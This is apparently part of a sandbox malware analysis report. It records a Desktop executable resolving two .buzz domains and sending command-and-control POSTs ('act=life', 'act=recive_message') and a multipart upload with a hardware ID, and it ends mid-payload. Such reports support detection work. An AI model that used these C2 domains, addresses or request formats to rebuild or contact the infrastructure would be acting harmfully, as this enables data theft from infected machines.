Dec 27, 2024 15:35:56.059361935 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.059405088 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.059504032 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.059534073 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.059643984 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.059674978 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.059787035 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.059824944 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.059839010 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.059847116 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.059940100 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.059962988 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.059979916 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.060091019 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.060122967 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.107327938 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.107481003 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.107520103 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.107541084 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.107557058 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:56.107579947 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:56.107610941 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:58.473795891 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:58.473877907 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:58.473932028 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:58.474101067 CET	49804	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:58.474123955 CET	443	49804	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:58.529467106 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:58.529506922 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:58.529587030 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:58.529860020 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:58.529875994 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:59.839751005 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:59.839891911 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:59.841048956 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:59.841080904 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:59.841312885 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:35:59.842530966 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:59.842570066 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:35:59.842612028 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.622828007 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.622898102 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.622927904 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.622978926 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.622992992 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.623008013 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.623053074 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.623091936 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.623114109 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.630845070 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.639239073 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.639362097 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.639365911 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.639417887 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.639492035 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.647547960 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.647825003 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.647882938 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.647953033 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.647989988 CET	443	49814	104.21.74.40	192.168.2.5
Dec 27, 2024 15:36:00.648015976 CET	49814	443	192.168.2.5	104.21.74.40
Dec 27, 2024 15:36:00.648030996 CET	443	49814	104.21.74.40	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 15:34:56.154674053 CET	60726	53	192.168.2.5	1.1.1.1
Dec 27, 2024 15:34:56.447415113 CET	53	60726	1.1.1.1	192.168.2.5
Dec 27, 2024 15:35:28.132987022 CET	62020	53	192.168.2.5	1.1.1.1
Dec 27, 2024 15:35:28.597863913 CET	53	62020	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 15:34:56.154674053 CET	192.168.2.5	1.1.1.1	0x1ac1	Standard query (0)	mindhandru.buzz	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:35:28.132987022 CET	192.168.2.5	1.1.1.1	0x3f16	Standard query (0)	prisonyfork.buzz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 15:34:56.447415113 CET	1.1.1.1	192.168.2.5	0x1ac1	No error (0)	mindhandru.buzz	104.21.11.101	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:34:56.447415113 CET	1.1.1.1	192.168.2.5	0x1ac1	No error (0)	mindhandru.buzz	172.67.165.185	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:35:28.597863913 CET	1.1.1.1	192.168.2.5	0x3f16	No error (0)	prisonyfork.buzz	104.21.74.40	A (IP address)	IN (0x0001)	false
Dec 27, 2024 15:35:28.597863913 CET	1.1.1.1	192.168.2.5	0x3f16	No error (0)	prisonyfork.buzz	172.67.197.192	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mindhandru.buzz

prisonyfork.buzz

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	104.21.11.101	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:34:57 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mindhandru.buzz
2024-12-27 14:34:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49741	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:29 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: prisonyfork.buzz
2024-12-27 14:35:29 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-27 14:35:41 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i7un5nvd7tvbviqgp8a7mh12mf; expires=Tue, 22 Apr 2025 08:22:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2%2BYWUCW63b2er4keLG7xF0B1VNENTCOpGodQytnUjnYnzDNtsshu21fdw0bz0ytIjXgAQYABWiBk4UVkf0WVFyGlfLlsBw5WxO%2FrZV%2BinJuYItkRys%2FO34KfIVwl3%2B14Wlw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a09999bc75e7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1600&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1818181&cwnd=214&unsent_bytes=0&cid=8cb68c9d00149d4c&ts=11919&x=0"
2024-12-27 14:35:41 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-27 14:35:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49770	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:43 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: prisonyfork.buzz
2024-12-27 14:35:43 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6299960613&j=
2024-12-27 14:35:43 UTC	1121	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 14:35:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pif2dlm7tkvrq5itn5i5vs69tf; expires=Tue, 22 Apr 2025 08:22:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JH8qhaXJl8kKKf%2Bo%2ByKWIHyQe0soBflok5cjzReiEhLALRI9dquQ7IeAP2nMLmnPSoiXHNiQpWC6eLifPovrtuQlgwJcHL8Z8qIDB9AUexZUC9ZSq7e0vvthz7wpEqLaaYAM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8a09ebd877199d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16124&min_rtt=2081&rtt_var=9283&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=952&delivery_rate=1403171&cwnd=223&unsent_bytes=0&cid=38717b7d8119f3b5&ts=768&x=0"
2024-12-27 14:35:43 UTC	248	IN	Data Raw: 34 39 31 63 0d 0a 31 68 64 5a 57 59 39 64 6e 36 65 37 48 33 66 31 77 69 53 30 56 45 30 43 50 68 67 6b 66 70 6c 6a 6d 4e 63 68 6e 37 72 2b 56 58 75 74 4e 53 39 37 74 57 6d 7a 68 63 68 36 56 63 2b 32 56 73 45 78 59 53 42 66 66 41 5a 45 2f 77 4c 30 70 45 53 7a 6d 49 67 34 57 65 78 78 4f 44 58 38 4f 4c 4f 46 33 6d 64 56 7a 35 6c 66 6c 6a 45 6a 49 41 51 36 51 52 54 37 41 76 53 31 51 50 54 56 6a 6a 6b 59 76 6e 73 2b 4d 65 6f 2b 2b 38 62 58 63 68 4b 51 70 30 58 65 4f 69 52 76 56 6e 55 47 55 72 73 47 34 76 55 62 76 66 65 62 49 52 71 62 64 69 6f 79 72 53 43 7a 33 4a 6c 36 47 64 66 34 42 74 55 78 4c 32 35 59 66 45 38 57 38 51 76 38 74 45 58 31 79 70 63 7a 45 37 35 31 50 54 44 67 4e 2b 2f 4c 33 58 55 5a 6c 71 31 46 6c 6e 68 76 5a 30 51 36 48 6c Data Ascii: 491c1hdZWY9dn6e7H3f1wiS0VE0CPhgkfpljmNchn7r+VXutNS97tWmzhch6Vc+2VsExYSBffAZE/wL0pESzmIg4WexxODX8OLOF3mdVz5lfljEjIAQ6QRT7AvS1QPTVjjkYvns+Meo++8bXchKQp0XeOiRvVnUGUrsG4vUbvfebIRqbdioyrSCz3Jl6Gdf4BtUxL25YfE8W8Qv8tEX1ypczE751PTDgN+/L3XUZlq1FlnhvZ0Q6Hl
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 79 6f 4d 2f 6d 6b 55 75 6a 56 6a 44 46 5a 71 7a 73 69 65 2b 6f 7a 76 5a 32 5a 64 52 6d 5a 70 55 58 5a 4d 53 35 67 54 6e 56 47 48 2f 4d 4a 2f 72 39 4d 38 74 65 53 50 52 36 38 66 44 77 30 36 6a 66 37 79 74 6f 39 57 39 65 6e 58 70 5a 75 62 30 42 4d 65 55 55 49 39 68 43 36 71 67 33 6b 6d 4a 73 37 57 65 77 31 50 54 58 73 4d 76 33 58 30 58 59 65 6b 72 4a 4e 33 7a 73 69 59 46 46 77 53 52 2f 37 42 76 43 2f 54 50 66 63 6b 54 6f 66 74 48 56 37 64 61 30 34 35 59 57 42 50 54 61 53 73 45 48 61 49 47 31 61 48 47 55 49 42 62 73 47 39 76 55 62 76 64 43 5a 4e 42 71 2f 65 6a 67 7a 35 69 33 39 31 39 39 77 45 49 57 6d 51 39 67 38 4c 48 4a 57 64 45 41 66 38 67 72 7a 73 45 54 35 6d 4e 4a 33 48 71 77 31 59 33 76 4d 4d 76 62 4a 30 32 6f 56 31 37 38 49 7a 33 59 6f 62 42 77 69 42 Data Ascii: yoM/mkUujVjDFZqzsie+ozvZ2ZdRmZpUXZMS5gTnVGH/MJ/r9M8teSPR68fDw06jf7yto9W9enXpZub0BMeUUI9hC6qg3kmJs7Wew1PTXsMv3X0XYekrJN3zsiYFFwSR/7BvC/TPfckToftHV7da045YWBPTaSsEHaIG1aHGUIBbsG9vUbvdCZNBq/ejgz5i39199wEIWmQ9g8LHJWdEAf8grzsET5mNJ3Hqw1Y3vMMvbJ02oV178Iz3YobBwiB
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 36 2b 77 50 36 77 4e 78 76 57 5a 35 32 4c 7a 6a 6e 66 63 6a 47 31 33 4d 53 67 65 42 5a 6d 43 39 76 5a 31 41 36 48 6c 7a 32 41 50 4b 7a 55 66 4c 56 6e 7a 6b 58 75 33 41 30 4d 2b 30 2f 38 4d 44 64 64 68 36 55 72 55 4c 45 50 43 39 6f 57 58 74 4d 46 72 74 50 75 72 4a 62 76 59 44 63 42 67 36 2f 4e 77 34 34 34 7a 48 36 30 35 6c 69 57 34 37 67 51 64 70 32 64 79 42 52 63 6b 4d 5a 39 41 44 77 75 30 62 33 31 4a 51 35 47 71 5a 36 50 7a 76 68 4e 2f 66 49 31 33 6b 64 6e 71 74 4e 30 44 59 75 61 68 77 30 42 68 76 6a 51 61 4c 31 64 2f 72 55 6b 54 68 62 67 58 59 31 4e 65 6f 70 76 64 71 58 5a 46 57 51 72 41 61 4f 64 69 4e 70 58 48 46 4d 47 50 73 47 39 37 42 41 2b 74 75 52 4d 42 4f 36 63 6a 38 33 35 44 4c 37 78 64 35 35 45 49 57 6c 54 39 6f 36 62 79 34 63 66 56 35 63 6f 30 Data Ascii: 6+wP6wNxvWZ52LzjnfcjG13MSgeBZmC9vZ1A6Hlz2APKzUfLVnzkXu3A0M+0/8MDddh6UrULEPC9oWXtMFrtPurJbvYDcBg6/Nw444zH605liW47gQdp2dyBRckMZ9ADwu0b31JQ5GqZ6PzvhN/fI13kdnqtN0DYuahw0BhvjQaL1d/rUkThbgXY1NeopvdqXZFWQrAaOdiNpXHFMGPsG97BA+tuRMBO6cj835DL7xd55EIWlT9o6by4cfV5co0
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 76 59 44 63 50 68 43 6d 65 7a 55 79 34 44 6e 31 77 74 64 77 48 70 47 72 51 64 45 77 49 6d 68 52 66 30 55 64 2f 77 76 6f 74 6b 6a 33 31 5a 5a 33 56 2f 52 79 49 33 75 31 66 39 72 4a 38 47 30 4f 68 62 59 47 79 58 67 32 49 46 74 32 42 6b 53 37 41 76 57 38 54 50 58 51 6b 7a 67 64 75 6e 4d 39 4e 75 67 77 39 39 66 52 63 78 69 63 72 30 33 45 4e 69 4a 6b 55 48 35 4f 46 2f 46 42 74 50 56 45 35 5a 6a 45 64 79 79 35 65 6a 73 34 2b 33 2f 69 69 38 41 39 45 70 76 67 48 70 59 36 49 57 42 54 64 6b 6f 58 38 77 44 32 75 30 54 34 30 5a 51 2f 43 37 56 78 4d 7a 72 6a 4d 50 7a 42 33 48 67 52 6b 4b 52 41 32 58 5a 68 49 46 74 69 42 6b 53 37 4c 74 32 41 41 64 7a 69 33 43 68 58 72 54 55 38 4e 36 31 6e 76 63 6e 61 63 52 32 59 70 6b 2f 61 50 43 5a 72 55 48 46 43 45 50 49 45 2f 4c 52 Data Ascii: vYDcPhCmezUy4Dn1wtdwHpGrQdEwImhRf0Ud/wvotkj31ZZ3V/RyI3u1f9rJ8G0OhbYGyXg2IFt2BkS7AvW8TPXQkzgdunM9Nugw99fRcxicr03ENiJkUH5OF/FBtPVE5ZjEdyy5ejs4+3/ii8A9EpvgHpY6IWBTdkoX8wD2u0T40ZQ/C7VxMzrjMPzB3HgRkKRA2XZhIFtiBkS7Lt2AAdzi3ChXrTU8N61nvcnacR2Ypk/aPCZrUHFCEPIE/LR
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 6a 41 51 70 6e 73 32 4e 4f 55 33 39 4d 54 64 65 42 69 52 72 45 7a 58 4d 53 46 75 56 44 6f 49 58 50 77 5a 75 75 30 44 33 4d 69 48 4a 51 2b 35 56 44 59 30 72 53 43 7a 33 4a 6c 36 47 64 66 34 42 74 38 6b 4b 32 31 4f 63 30 45 53 39 41 4c 6f 74 45 37 32 79 70 73 34 48 62 4e 35 50 54 54 72 50 76 6a 50 31 58 6f 51 6e 4b 39 4b 6c 6e 68 76 5a 30 51 36 48 6c 7a 56 43 75 6d 69 51 50 50 54 69 69 78 5a 71 7a 73 69 65 2b 6f 7a 76 5a 32 5a 66 68 36 63 70 45 62 61 4e 69 74 74 58 47 68 4a 47 2f 77 49 38 61 64 4a 2b 74 2b 58 50 78 4b 37 63 79 6b 33 34 79 33 34 31 38 73 39 57 39 65 6e 58 70 5a 75 62 31 5a 62 61 6c 59 66 75 54 44 73 74 6c 58 32 31 5a 42 33 42 76 70 73 65 7a 7a 68 66 36 57 46 33 33 49 63 6c 4b 39 48 33 7a 6f 69 5a 56 56 2f 52 78 72 2f 43 2f 43 31 52 66 76 5a Data Ascii: jAQpns2NOU39MTdeBiRrEzXMSFuVDoIXPwZuu0D3MiHJQ+5VDY0rSCz3Jl6Gdf4Bt8kK21Oc0ES9ALotE72yps4HbN5PTTrPvjP1XoQnK9KlnhvZ0Q6HlzVCumiQPPTiixZqzsie+ozvZ2Zfh6cpEbaNittXGhJG/wI8adJ+t+XPxK7cyk34y3418s9W9enXpZub1ZbalYfuTDstlX21ZB3Bvpsezzhf6WF33IclK9H3zoiZVV/Rxr/C/C1RfvZ
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 52 79 4e 33 75 31 66 2f 37 43 32 6e 77 66 6e 71 78 4a 30 54 49 39 61 6c 74 6f 52 78 33 77 44 50 61 31 54 76 44 53 6e 54 34 55 75 48 67 38 50 4f 49 36 76 59 75 5a 65 67 33 58 2b 41 62 33 4f 79 52 73 42 79 41 47 41 37 55 59 75 72 4a 50 76 59 44 63 4e 78 4f 78 66 7a 59 34 34 6a 7a 76 78 4e 39 76 46 5a 71 71 56 4e 77 39 4b 6d 31 52 64 30 55 61 2f 51 72 32 70 30 72 39 32 35 64 33 56 2f 52 79 49 33 75 31 66 39 37 53 7a 33 63 53 6d 37 5a 4e 31 7a 55 35 62 55 77 36 43 46 7a 71 42 75 76 31 47 2b 76 49 69 7a 41 47 2b 6d 78 37 50 4f 46 2f 70 59 58 66 64 42 4f 51 70 6b 6a 45 4d 79 6c 76 55 33 4e 50 47 50 4d 43 2b 72 46 48 2b 74 32 66 4f 78 4b 7a 64 6a 51 2f 35 44 48 30 79 70 6b 7a 56 5a 43 34 42 6f 35 32 44 6e 74 66 64 6b 74 63 35 45 2f 6a 39 55 54 78 6d 4d 52 33 46 Data Ascii: RyN3u1f/7C2nwfnqxJ0TI9altoRx3wDPa1TvDSnT4UuHg8POI6vYuZeg3X+Ab3OyRsByAGA7UYurJPvYDcNxOxfzY44jzvxN9vFZqqVNw9Km1Rd0Ua/Qr2p0r925d3V/RyI3u1f97Sz3cSm7ZN1zU5bUw6CFzqBuv1G+vIizAG+mx7POF/pYXfdBOQpkjEMylvU3NPGPMC+rFH+t2fOxKzdjQ/5DH0ypkzVZC4Bo52Dntfdktc5E/j9UTxmMR3F
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 77 2b 7a 72 36 30 35 74 49 46 70 6d 75 51 63 42 32 4d 46 38 53 4f 6b 6b 47 75 31 6e 44 72 41 50 36 31 4e 78 76 57 61 46 79 4f 7a 7a 33 4b 66 72 4a 79 48 59 59 6d 34 4a 4a 30 53 41 73 62 31 39 72 54 31 44 77 44 4c 72 37 41 2f 72 41 33 47 39 5a 6d 33 49 74 4f 4d 49 38 37 4d 79 5a 4d 31 57 51 74 67 61 4f 64 68 45 67 54 6e 6c 57 48 2f 51 51 78 50 55 62 35 4f 62 63 50 41 2b 7a 5a 54 67 74 35 6a 4c 78 31 4f 63 39 54 63 50 79 46 49 52 6b 66 58 38 63 5a 58 6c 53 75 77 43 36 37 58 72 6b 6d 49 70 33 51 65 59 37 65 79 6d 74 5a 37 32 43 32 6d 38 48 6b 61 4e 51 31 58 45 52 58 6e 74 73 54 42 76 72 42 75 32 36 41 37 4f 59 6b 33 64 42 6a 54 55 79 50 50 59 75 36 38 6a 4a 65 6c 57 6f 37 67 62 4f 64 6e 63 67 61 58 6c 49 45 76 77 58 36 2f 68 6b 36 39 4b 62 4a 78 36 6a 65 6e Data Ascii: w+zr605tIFpmuQcB2MF8SOkkGu1nDrAP61NxvWaFyOzz3KfrJyHYYm4JJ0SAsb19rT1DwDLr7A/rA3G9Zm3ItOMI87MyZM1WQtgaOdhEgTnlWH/QQxPUb5ObcPA+zZTgt5jLx1Oc9TcPyFIRkfX8cZXlSuwC67XrkmIp3QeY7eymtZ72C2m8HkaNQ1XERXntsTBvrBu26A7OYk3dBjTUyPPYu68jJelWo7gbOdncgaXlIEvwX6/hk69KbJx6jen
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 39 73 58 65 62 51 4f 4d 37 45 37 56 4c 44 56 65 59 6c 46 4b 47 76 77 62 2f 62 4e 6c 33 5a 6a 53 64 78 62 30 4c 51 4a 37 70 58 2f 43 69 35 6c 6c 56 63 2f 67 63 39 55 34 49 57 64 4b 61 77 73 30 32 44 76 41 39 32 2f 36 7a 64 34 44 48 71 52 6b 4d 44 62 68 66 37 4f 46 33 7a 31 4e 78 2b 34 47 30 69 64 76 4f 41 77 6f 48 55 6d 6f 56 71 72 6e 58 4c 50 42 33 43 46 5a 37 43 64 31 65 2f 39 2f 70 59 57 65 66 67 65 46 70 6b 58 41 4e 57 68 65 59 6c 31 49 47 2f 6f 58 36 71 4a 4d 77 2b 61 4a 4e 42 65 36 63 69 30 71 72 58 47 39 79 70 6b 6c 4c 4e 66 6f 42 75 6c 34 62 33 67 63 49 67 59 70 2b 41 2f 30 73 6c 58 73 6c 62 73 35 48 72 56 6a 4b 79 7a 69 66 37 4f 46 33 7a 31 4e 78 65 34 47 30 69 64 76 4f 41 77 6f 48 55 6d 6f 56 71 72 6e 58 4c 50 42 33 43 46 5a 37 43 64 31 65 2f 39 Data Ascii: 9sXebQOM7E7VLDVeYlFKGvwb/bNl3ZjSdxb0LQJ7pX/Ci5llVc/gc9U4IWdKaws02DvA92/6zd4DHqRkMDbhf7OF3z1Nx+4G0idvOAwoHUmoVqrnXLPB3CFZ7Cd1e/9/pYWefgeFpkXANWheYl1IG/oX6qJMw+aJNBe6ci0qrXG9ypklLNfoBul4b3gcIgYp+A/0slXslbs5HrVjKyzif7OF3z1Nxe4G0idvOAwoHUmoVqrnXLPB3CFZ7Cd1e/9
2024-12-27 14:35:43 UTC	1369	IN	Data Raw: 6d 73 57 31 2b 34 47 32 6e 5a 33 49 46 31 77 56 68 48 30 42 72 61 79 57 66 71 59 30 6e 63 58 39 43 31 37 4f 75 63 76 38 4d 72 65 4d 52 4f 5a 72 67 62 4a 65 44 59 67 53 6a 6f 65 54 37 56 42 36 50 55 62 76 5a 2b 66 4a 51 75 79 64 69 30 34 71 67 48 44 36 4d 74 36 42 5a 54 69 64 39 73 79 4f 58 56 66 61 6b 45 69 78 53 7a 6f 73 6c 50 2b 6d 71 30 68 47 72 52 37 50 48 75 6a 66 2b 57 46 67 54 30 34 68 61 64 57 31 58 5a 68 49 46 41 36 48 6c 7a 32 45 2f 32 6c 51 4c 48 66 68 6a 42 5a 71 7a 73 69 65 2f 74 2f 70 5a 61 58 50 51 66 58 2b 41 61 52 4f 43 4a 68 58 33 52 46 44 75 6b 48 2b 61 4e 41 75 75 61 69 47 67 75 7a 5a 54 68 35 33 44 4c 35 30 38 78 2b 42 5a 43 65 65 50 73 6b 4b 48 42 66 4f 47 6f 62 39 67 33 45 69 33 54 73 33 34 78 31 50 37 64 6a 4f 48 75 6a 66 2b 57 46 Data Ascii: msW1+4G2nZ3IF1wVhH0BrayWfqY0ncX9C17Oucv8MreMROZrgbJeDYgSjoeT7VB6PUbvZ+fJQuydi04qgHD6Mt6BZTid9syOXVfakEixSzoslP+mq0hGrR7PHujf+WFgT04hadW1XZhIFA6Hlz2E/2lQLHfhjBZqzsie/t/pZaXPQfX+AaROCJhX3RFDukH+aNAuuaiGguzZTh53DL508x+BZCeePskKHBfOGob9g3Ei3Ts34x1P7djOHujf+WF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49776	104.21.74.40	443	2020	C:\Users\user\Desktop\0x001f00000004676d-1858.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 14:35:45 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SH1RINP2K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12786 Host: prisonyfork.buzz
2024-12-27 14:35:45 UTC	12786	OUT	Data Raw: 2d 2d 53 48 31 52 49 4e 50 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 39 36 37 39 43 31 36 39 35 36 45 46 42 37 32 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 53 48 31 52 49 4e 50 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 48 31 52 49 4e 50 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 32 39 39 39 36 30 36 31 33 0d 0a 2d 2d 53 48 31 52 49 4e 50 32 4b 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --SH1RINP2KContent-Disposition: form-data; name="hwid"99679C16956EFB728B85154C9421A187--SH1RINP2KContent-Disposition: form-data; name="pid"2--SH1RINP2KContent-Disposition: form-data; 